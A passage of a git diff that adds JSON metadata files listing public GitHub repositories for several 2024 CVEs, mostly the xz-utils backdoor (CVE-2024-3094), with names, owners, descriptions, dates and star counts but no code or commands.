new file mode 100644
index 0000000000..55acda9c76
--- /dev/null
+++ b/2024/CVE-2024-30656.json
@@ -0,0 +1,41 @@
+[
+ {
+ "id": 783836651,
+ "name": "Firebolt-wristphone-vulnerability",
+ "full_name": "Yashodhanvivek\/Firebolt-wristphone-vulnerability",
+ "owner": {
+ "login": "Yashodhanvivek",
+ "id": 5335615,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5335615?v=4",
+ "html_url": "https:\/\/github.com\/Yashodhanvivek"
+ },
+ "html_url": "https:\/\/github.com\/Yashodhanvivek\/Firebolt-wristphone-vulnerability",
+ "description": "This repository is for Firebolt wristphone vulnerability for CVE ID CVE-2024-30656 suggested by MITRE. Mitre yet to confirm on ID",
+ "fork": false,
+ "created_at": "2024-04-08T17:05:39Z",
+ "updated_at": "2024-04-09T14:45:57Z",
+ "pushed_at": "2024-04-18T09:41:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "firebolt",
+ "vulnerability",
+ "wifi-deauth",
+ "wifi-deauther",
+ "wifi-hacking",
+ "wifi-security",
+ "wristphone"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-30850.json b/2024/CVE-2024-30850.json
new file mode 100644
index 0000000000..c791a2a3a0
--- /dev/null
+++ b/2024/CVE-2024-30850.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 782713509,
+ "name": "CVE-2024-30850-chaos-rat-rce-poc",
+ "full_name": "chebuya\/CVE-2024-30850-chaos-rat-rce-poc",
+ "owner": {
+ "login": "chebuya",
+ "id": 146861503,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146861503?v=4",
+ "html_url": "https:\/\/github.com\/chebuya"
+ },
+ "html_url": "https:\/\/github.com\/chebuya\/CVE-2024-30850-chaos-rat-rce-poc",
+ "description": "CHAOS RAT web panel path RCE PoC",
+ "fork": false,
+ "created_at": "2024-04-05T21:35:04Z",
+ "updated_at": "2024-06-18T03:08:11Z",
+ "pushed_at": "2024-04-15T17:46:32Z",
+ "stargazers_count": 25,
+ "watchers_count": 25,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 25,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-30851.json b/2024/CVE-2024-30851.json
new file mode 100644
index 0000000000..b0e1ccb0b4
--- /dev/null
+++ b/2024/CVE-2024-30851.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 782242240,
+ "name": "CVE-2024-30851-jasmin-ransomware-path-traversal-poc",
+ "full_name": "chebuya\/CVE-2024-30851-jasmin-ransomware-path-traversal-poc",
+ "owner": {
+ "login": "chebuya",
+ "id": 146861503,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146861503?v=4",
+ "html_url": "https:\/\/github.com\/chebuya"
+ },
+ "html_url": "https:\/\/github.com\/chebuya\/CVE-2024-30851-jasmin-ransomware-path-traversal-poc",
+ "description": "Jasmin ransomware web panel path traversal PoC",
+ "fork": false,
+ "created_at": "2024-04-04T22:59:55Z",
+ "updated_at": "2024-05-22T21:42:43Z",
+ "pushed_at": "2024-04-09T03:40:52Z",
+ "stargazers_count": 23,
+ "watchers_count": 23,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 23,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-30896.json b/2024/CVE-2024-30896.json
new file mode 100644
index 0000000000..0350bdbe67
--- /dev/null
+++ b/2024/CVE-2024-30896.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 776087071,
+ "name": "CVE-2024-30896",
+ "full_name": "XenoM0rph97\/CVE-2024-30896",
+ "owner": {
+ "login": "XenoM0rph97",
+ "id": 44051481,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44051481?v=4",
+ "html_url": "https:\/\/github.com\/XenoM0rph97"
+ },
+ "html_url": "https:\/\/github.com\/XenoM0rph97\/CVE-2024-30896",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-22T16:50:40Z",
+ "updated_at": "2024-04-05T12:58:01Z",
+ "pushed_at": "2024-04-05T12:58:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-3094.json b/2024/CVE-2024-3094.json
new file mode 100644
index 0000000000..e6a4451464
--- /dev/null
+++ b/2024/CVE-2024-3094.json
@@ -0,0 +1,1802 @@
+[
+ {
+ "id": 779364261,
+ "name": "CVE-2024-3094-info",
+ "full_name": "byinarie\/CVE-2024-3094-info",
+ "owner": {
+ "login": "byinarie",
+ "id": 20119926,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20119926?v=4",
+ "html_url": "https:\/\/github.com\/byinarie"
+ },
+ "html_url": "https:\/\/github.com\/byinarie\/CVE-2024-3094-info",
+ "description": "Information for CVE-2024-3094",
+ "fork": false,
+ "created_at": "2024-03-29T17:03:01Z",
+ "updated_at": "2024-05-14T12:14:53Z",
+ "pushed_at": "2024-04-01T16:01:34Z",
+ "stargazers_count": 51,
+ "watchers_count": 51,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 51,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 779430633,
+ "name": "CVE-2024-3094-checker",
+ "full_name": "FabioBaroni\/CVE-2024-3094-checker",
+ "owner": {
+ "login": "FabioBaroni",
+ "id": 2703045,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2703045?v=4",
+ "html_url": "https:\/\/github.com\/FabioBaroni"
+ },
+ "html_url": "https:\/\/github.com\/FabioBaroni\/CVE-2024-3094-checker",
+ "description": "Quick and dirty PoC for checking whether a vulnerable version of xz-utils is installed (CVE-2024-3094)",
+ "fork": false,
+ "created_at": "2024-03-29T20:28:17Z",
+ "updated_at": "2024-06-14T14:33:23Z",
+ "pushed_at": "2024-03-31T00:13:39Z",
+ "stargazers_count": 72,
+ "watchers_count": 72,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 72,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 779437270,
+ "name": "CVE-2024-3094-Vulnerabity-Checker",
+ "full_name": "lypd0\/CVE-2024-3094-Vulnerabity-Checker",
+ "owner": {
+ "login": "lypd0",
+ "id": 146327014,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146327014?v=4",
+ "html_url": "https:\/\/github.com\/lypd0"
+ },
+ "html_url": "https:\/\/github.com\/lypd0\/CVE-2024-3094-Vulnerabity-Checker",
+ "description": "Verify that your XZ Utils version is not vulnerable to CVE-2024-3094",
+ "fork": false,
+ "created_at": "2024-03-29T20:52:27Z",
+ "updated_at": "2024-05-03T02:31:49Z",
+ "pushed_at": "2024-03-29T21:56:17Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "check",
+ "checker",
+ "cve-2024-3094",
+ "exploit",
+ "scanner",
+ "script",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 779449882,
+ "name": "xz_utils-CVE-2024-3094",
+ "full_name": "OpensourceICTSolutions\/xz_utils-CVE-2024-3094",
+ "owner": {
+ "login": "OpensourceICTSolutions",
+ "id": 68592870,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68592870?v=4",
+ "html_url": "https:\/\/github.com\/OpensourceICTSolutions"
+ },
+ "html_url": "https:\/\/github.com\/OpensourceICTSolutions\/xz_utils-CVE-2024-3094",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-29T21:41:42Z",
+ "updated_at": "2024-03-29T21:41:42Z",
+ "pushed_at": "2024-03-29T21:42:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 779473804,
+ "name": "xz_cve-2024-3094_detection",
+ "full_name": "bioless\/xz_cve-2024-3094_detection",
+ "owner": {
+ "login": "bioless",
+ "id": 10271875,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10271875?v=4",
+ "html_url": "https:\/\/github.com\/bioless"
+ },
+ "html_url": "https:\/\/github.com\/bioless\/xz_cve-2024-3094_detection",
+ "description": "Script to detect CVE-2024-3094.",
+ "fork": false,
+ "created_at": "2024-03-29T23:20:22Z",
+ "updated_at": "2024-03-29T23:23:15Z",
+ "pushed_at": "2024-03-29T23:23:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 779474128,
+ "name": "CVE-2024-3094_xz_check",
+ "full_name": "Hacker-Hermanos\/CVE-2024-3094_xz_check",
+ "owner": {
+ "login": "Hacker-Hermanos",
+ "id": 152432195,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152432195?v=4",
+ "html_url": "https:\/\/github.com\/Hacker-Hermanos"
+ },
+ "html_url": "https:\/\/github.com\/Hacker-Hermanos\/CVE-2024-3094_xz_check",
+ "description": "This repository contains a Bash script and a one-liner command to verify if a system is running a vulnerable version of the \"xz\" utility, as specified by CVE-2024-3094.",
+ "fork": false,
+ "created_at": "2024-03-29T23:21:44Z",
+ "updated_at": "2024-04-07T21:38:02Z",
+ "pushed_at": "2024-03-30T05:21:13Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 779476965,
+ "name": "CVE-2024-3094",
+ "full_name": "Fractal-Tess\/CVE-2024-3094",
+ "owner": {
+ "login": "Fractal-Tess",
+ "id": 75957529,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75957529?v=4",
+ "html_url": "https:\/\/github.com\/Fractal-Tess"
+ },
+ "html_url": "https:\/\/github.com\/Fractal-Tess\/CVE-2024-3094",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-29T23:36:07Z",
+ "updated_at": "2024-03-29T23:36:13Z",
+ "pushed_at": "2024-03-30T00:34:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 779576477,
+ "name": "CVE-2024-3094-check",
+ "full_name": "wgetnz\/CVE-2024-3094-check",
+ "owner": {
+ "login": "wgetnz",
+ "id": 62410571,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62410571?v=4",
+ "html_url": "https:\/\/github.com\/wgetnz"
+ },
+ "html_url": "https:\/\/github.com\/wgetnz\/CVE-2024-3094-check",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-30T07:38:39Z",
+ "updated_at": "2024-04-07T11:15:50Z",
+ "pushed_at": "2024-03-30T08:08:40Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 779626345,
+ "name": "xz-backdoor-github",
+ "full_name": "emirkmo\/xz-backdoor-github",
+ "owner": {
+ "login": "emirkmo",
+ "id": 11209690,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11209690?v=4",
+ "html_url": "https:\/\/github.com\/emirkmo"
+ },
+ "html_url": "https:\/\/github.com\/emirkmo\/xz-backdoor-github",
+ "description": "History of commits related to the xz backdoor Discovered On March 29, 2024: CVE-2024-3094.",
+ "fork": false,
+ "created_at": "2024-03-30T10:48:54Z",
+ "updated_at": "2024-05-15T20:20:03Z",
+ "pushed_at": "2024-04-01T15:12:50Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 779717708,
+ "name": "CVE-2024-3094",
+ "full_name": "ashwani95\/CVE-2024-3094",
+ "owner": {
+ "login": "ashwani95",
+ "id": 36373739,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36373739?v=4",
+ "html_url": "https:\/\/github.com\/ashwani95"
+ },
+ "html_url": "https:\/\/github.com\/ashwani95\/CVE-2024-3094",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-30T15:29:05Z",
+ "updated_at": "2024-03-30T15:29:38Z",
+ "pushed_at": "2024-03-30T17:00:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 779734707,
+ "name": "xz-utils-vuln-checker",
+ "full_name": "harekrishnarai\/xz-utils-vuln-checker",
+ "owner": {
+ "login": "harekrishnarai",
+ "id": 63994966,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63994966?v=4",
+ "html_url": "https:\/\/github.com\/harekrishnarai"
+ },
+ "html_url": "https:\/\/github.com\/harekrishnarai\/xz-utils-vuln-checker",
+ "description": "Checker for CVE-2024-3094 where malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code.",
+ "fork": false,
+ "created_at": "2024-03-30T16:25:50Z",
+ "updated_at": "2024-03-30T19:45:26Z",
+ "pushed_at": "2024-03-30T17:43:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "checker",
+ "cve",
+ "cve-2024-3094",
+ "xz",
+ "xz-utils"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 779754842,
+ "name": "CVE-2024-3094",
+ "full_name": "teyhouse\/CVE-2024-3094",
+ "owner": {
+ "login": "teyhouse",
+ "id": 828439,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/828439?v=4",
+ "html_url": "https:\/\/github.com\/teyhouse"
+ },
+ "html_url": "https:\/\/github.com\/teyhouse\/CVE-2024-3094",
+ "description": "K8S and Docker Vulnerability Check for CVE-2024-3094",
+ "fork": false,
+ "created_at": "2024-03-30T17:35:49Z",
+ "updated_at": "2024-04-26T18:17:21Z",
+ "pushed_at": "2024-03-31T14:36:00Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 779783613,
+ "name": "CVE-2024-3094-Vulnerability-Checker-Fixer",
+ "full_name": "alokemajumder\/CVE-2024-3094-Vulnerability-Checker-Fixer",
+ "owner": {
+ "login": "alokemajumder",
+ "id": 26596583,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26596583?v=4",
+ "html_url": "https:\/\/github.com\/alokemajumder"
+ },
+ "html_url": "https:\/\/github.com\/alokemajumder\/CVE-2024-3094-Vulnerability-Checker-Fixer",
+ "description": "Shell scripts to identify and fix installations of xz-utils affected by the CVE-2024-3094 vulnerability. Versions 5.6.0 and 5.6.1 of xz-utils are known to be vulnerable, and this script aids in detecting them and optionally downgrading to a stable, un-compromised version (5.4.6) or upgrading to latest version. Added Ansible Playbook",
+ "fork": false,
+ "created_at": "2024-03-30T19:23:30Z",
+ "updated_at": "2024-05-11T20:14:16Z",
+ "pushed_at": "2024-04-07T07:40:48Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": true,
+ "topics": [
+ "ansible",
+ "ansible-playbook",
+ "ansible-playbooks",
+ "cve-2024-3094",
+ "linux",
+ "opensource",
+ "opensource-projects",
+ "ssh",
+ "vulnerabilities",
+ "vulnerability-detection",
+ "vulnerability-scanners",
+ "xz",
+ "xz-compression-utilities",
+ "xz-files",
+ "xz-utils"
+ ],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 779793653,
+ "name": "CVE-2024-3094",
+ "full_name": "Horizon-Software-Development\/CVE-2024-3094",
+ "owner": {
+ "login": "Horizon-Software-Development",
+ "id": 81176281,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81176281?v=4",
+ "html_url": "https:\/\/github.com\/Horizon-Software-Development"
+ },
+ "html_url": "https:\/\/github.com\/Horizon-Software-Development\/CVE-2024-3094",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-30T20:05:13Z",
+ "updated_at": "2024-04-08T18:20:25Z",
+ "pushed_at": "2024-03-30T20:16:43Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 779823084,
+ "name": "CVE-2024-3094-checker",
+ "full_name": "hazemkya\/CVE-2024-3094-checker",
+ "owner": {
+ "login": "hazemkya",
+ "id": 83143965,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83143965?v=4",
+ "html_url": "https:\/\/github.com\/hazemkya"
+ },
+ "html_url": "https:\/\/github.com\/hazemkya\/CVE-2024-3094-checker",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-30T21:56:17Z",
+ "updated_at": "2024-03-31T00:17:52Z",
+ "pushed_at": "2024-03-31T00:40:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 779825169,
+ "name": "xz-vulnerable-honeypot",
+ "full_name": "lockness-Ko\/xz-vulnerable-honeypot",
+ "owner": {
+ "login": "lockness-Ko",
+ "id": 42625905,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42625905?v=4",
+ "html_url": "https:\/\/github.com\/lockness-Ko"
+ },
+ "html_url": "https:\/\/github.com\/lockness-Ko\/xz-vulnerable-honeypot",
+ "description": "An ssh honeypot with the XZ backdoor. CVE-2024-3094",
+ "fork": false,
+ "created_at": "2024-03-30T22:07:24Z",
+ "updated_at": "2024-06-19T11:39:43Z",
+ "pushed_at": "2024-04-02T03:38:32Z",
+ "stargazers_count": 139,
+ "watchers_count": 139,
+ "has_discussions": false,
+ "forks_count": 23,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "backdoor",
+ "cve-2024-3094",
+ "honeypot",
+ "xz"
+ ],
+ "visibility": "public",
+ "forks": 23,
+ "watchers": 139,
+ "score": 0,
+ "subscribers_count": 8
+ },
+ {
+ "id": 779837781,
+ "name": "CVE-2024-3094-One-Liner",
+ "full_name": "brinhosa\/CVE-2024-3094-One-Liner",
+ "owner": {
+ "login": "brinhosa",
+ "id": 1003952,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1003952?v=4",
+ "html_url": "https:\/\/github.com\/brinhosa"
+ },
+ "html_url": "https:\/\/github.com\/brinhosa\/CVE-2024-3094-One-Liner",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-30T23:16:10Z",
+ "updated_at": "2024-04-05T03:16:33Z",
+ "pushed_at": "2024-04-01T12:09:12Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 779897643,
+ "name": "CVE-2024-3094",
+ "full_name": "isuruwa\/CVE-2024-3094",
+ "owner": {
+ "login": "isuruwa",
+ "id": 72663288,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72663288?v=4",
+ "html_url": "https:\/\/github.com\/isuruwa"
+ },
+ "html_url": "https:\/\/github.com\/isuruwa\/CVE-2024-3094",
+ "description": "CVE-2024-3094",
+ "fork": false,
+ "created_at": "2024-03-31T04:50:09Z",
+ "updated_at": "2024-03-31T05:32:39Z",
+ "pushed_at": "2024-03-31T05:31:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-3094",
+ "xz",
+ "xz-utils"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 779941483,
+ "name": "Check-CVE-2024-3094",
+ "full_name": "k4t3pr0\/Check-CVE-2024-3094",
+ "owner": {
+ "login": "k4t3pr0",
+ "id": 127739423,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127739423?v=4",
+ "html_url": "https:\/\/github.com\/k4t3pr0"
+ },
+ "html_url": "https:\/\/github.com\/k4t3pr0\/Check-CVE-2024-3094",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-31T08:14:41Z",
+ "updated_at": "2024-03-31T08:14:50Z",
+ "pushed_at": "2024-03-31T08:17:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 779977820,
+ "name": "CVE-2024-3094",
+ "full_name": "Yuma-Tsushima07\/CVE-2024-3094",
+ "owner": {
+ "login": "Yuma-Tsushima07",
+ "id": 63207324,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63207324?v=4",
+ "html_url": "https:\/\/github.com\/Yuma-Tsushima07"
+ },
+ "html_url": "https:\/\/github.com\/Yuma-Tsushima07\/CVE-2024-3094",
+ "description": "A script to detect if xz is vulnerable - CVE-2024-3094",
+ "fork": false,
+ "created_at": "2024-03-31T10:45:44Z",
+ "updated_at": "2024-04-03T04:33:34Z",
+ "pushed_at": "2024-03-31T11:02:02Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 779978033,
+ "name": "cve-2024-3094-tools",
+ "full_name": "jfrog\/cve-2024-3094-tools",
+ "owner": {
+ "login": "jfrog",
+ "id": 499942,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/499942?v=4",
+ "html_url": "https:\/\/github.com\/jfrog"
+ },
+ "html_url": "https:\/\/github.com\/jfrog\/cve-2024-3094-tools",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-31T10:46:33Z",
+ "updated_at": "2024-06-25T06:07:12Z",
+ "pushed_at": "2024-04-07T13:07:44Z",
+ "stargazers_count": 37,
+ "watchers_count": 37,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 37,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 780002901,
+ "name": "OSINT---CVE-2024-3094-",
+ "full_name": "krascovict\/OSINT---CVE-2024-3094-",
+ "owner": {
+ "login": "krascovict",
+ "id": 136443300,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136443300?v=4",
+ "html_url": "https:\/\/github.com\/krascovict"
+ },
+ "html_url": "https:\/\/github.com\/krascovict\/OSINT---CVE-2024-3094-",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-31T12:21:34Z",
+ "updated_at": "2024-03-31T12:21:34Z",
+ "pushed_at": "2024-03-31T12:21:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780033593,
+ "name": "CVE-2024-3094-patcher",
+ "full_name": "Simplifi-ED\/CVE-2024-3094-patcher",
+ "owner": {
+ "login": "Simplifi-ED",
+ "id": 75945575,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75945575?v=4",
+ "html_url": "https:\/\/github.com\/Simplifi-ED"
+ },
+ "html_url": "https:\/\/github.com\/Simplifi-ED\/CVE-2024-3094-patcher",
+ "description": "Ansible playbook for patching CVE-2024-3094",
+ "fork": false,
+ "created_at": "2024-03-31T14:09:28Z",
+ "updated_at": "2024-03-31T14:09:29Z",
+ "pushed_at": "2024-03-31T15:36:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780105802,
+ "name": "CVE-2024-3094-Nmap-NSE-script",
+ "full_name": "gayatriracha\/CVE-2024-3094-Nmap-NSE-script",
+ "owner": {
+ "login": "gayatriracha",
+ "id": 150776676,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150776676?v=4",
+ "html_url": "https:\/\/github.com\/gayatriracha"
+ },
+ "html_url": "https:\/\/github.com\/gayatriracha\/CVE-2024-3094-Nmap-NSE-script",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-31T17:53:11Z",
+ "updated_at": "2024-03-31T17:53:11Z",
+ "pushed_at": "2024-03-31T17:56:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 780121031,
+ "name": "CVE-2024-3094",
+ "full_name": "Mustafa1986\/CVE-2024-3094",
+ "owner": {
+ "login": "Mustafa1986",
+ "id": 27927358,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27927358?v=4",
+ "html_url": "https:\/\/github.com\/Mustafa1986"
+ },
+ "html_url": "https:\/\/github.com\/Mustafa1986\/CVE-2024-3094",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-31T18:46:58Z",
+ "updated_at": "2024-04-01T05:49:11Z",
+ "pushed_at": "2024-04-01T05:49:08Z",
